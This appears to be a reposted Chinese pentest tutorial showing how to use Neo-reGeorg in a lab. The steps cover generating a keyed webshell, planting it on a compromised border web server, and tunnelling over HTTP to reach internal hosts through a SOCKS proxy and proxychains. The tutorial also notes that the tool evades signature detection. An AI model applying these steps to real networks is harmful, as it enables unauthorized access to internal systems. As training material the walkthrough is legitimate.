隧道的概念、作用和应用场景在这里:
简介
Neo-reGeorg 是常见的 http 正向代理工具,是 reGeorg 工具的升级版。增加了很多特性,例如内容加密、请求头的指令随机生成,避免特征检测、请求头定制、响应码定制、支持 py3 等。
该工具基于 HTTP 协议建立隧道,会在本地创建 Socket 监听 1080 端口用于正向代理访问 Web 服务器隧道脚本,通过正向代理的方式把数据加密封装到 HTTP 数据包中,然后转发到服务器的横向网络中,同时隧道脚本也会把内网服务器端口的数据加密封装到 HTTP 数据包中转发到本地的 Socket 接口。
使用场景
目标网络限制严格,只有 HTTP 流量可以进入,其它不能进也不能出。
那这个时候你很想访问它的 SSH 咋办?你还非常想访问内网其它主机的远程桌面和数据库咋办?总不能凉拌!!那我们就用 HTTP 来搭隧道嘛!
举例
环境
Kali2023(攻击机):
192.168.49.139
CentOS7(边界服务器):
192.168.49.131、192.168.52.136
Windows Server 2016(内网服务器):
192.168.52.138
设备连通性:
Kali → CentOS7 → Windows Server 2016
这里假设我们已经拿到了边界服务器 CentOS7 的权限,具体怎么拿的不是这里的重点,所以先不管了,重点关注隧道的搭建和使用。我们的目标就是透过 CentOS7 访问到 Windows Server 2016!这里防火墙只允许 HTTP 流量进出。
生成木马
python neoreg.py generate -k 123456
指定密钥生成木马文件
植入木马
根据目标主机所提供的服务器类型来决定使用哪种木马。并将木马文件放入目标主机(CentOS7)的 Web 服务目录下。
远程连接木马
先将 neoreg.py 文件放入 kali,然后输入以下命令连接木马构建隧道并在本地创建 socks 代理
python3 neoreg.py -k 123456 -u http://192.168.49.131/tunnel.php -l 127.0.0.1 -p 1080
可选:通过 -l 指定本地 IP 地址,-p 指定本地端口,-t 指定要连接的内网设备 IP:PORT。
配置 socks5 代理(浏览器、proxifier、proxychains 等)
在 kali 上通过指定的工具配置好代理,地址和端口如下
IP 为 127.0.0.1
端口为 1080
浏览器访问内网服务器,首先直接访问肯定是失败的
http://192.168.52.138
配置代理
配置代理后访问是成功的
再看一下 proxychains 工具,这个工具 kali 自带,直接编辑一下工具的配置文件
vi /etc/proxychains4.conf
# 最下面添加以下内容
socks5 127.0.0.1 1080
接下来 kali 访问内网服务器
proxychains curl http://192.168.52.138
不用代理肯定是访问不了的
用代理就访问到了
最后计划一个,下次一起看看 ICMP 隧道,关注不迷路朋友们......
关注公众号,发送消息"隧道一"获取环境和工具
END
往期精彩回顾
原文始发于微信公众号(大伯为安全):隧道技术 | 不会挖隧道的渗透测试工程师不是好牛马
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论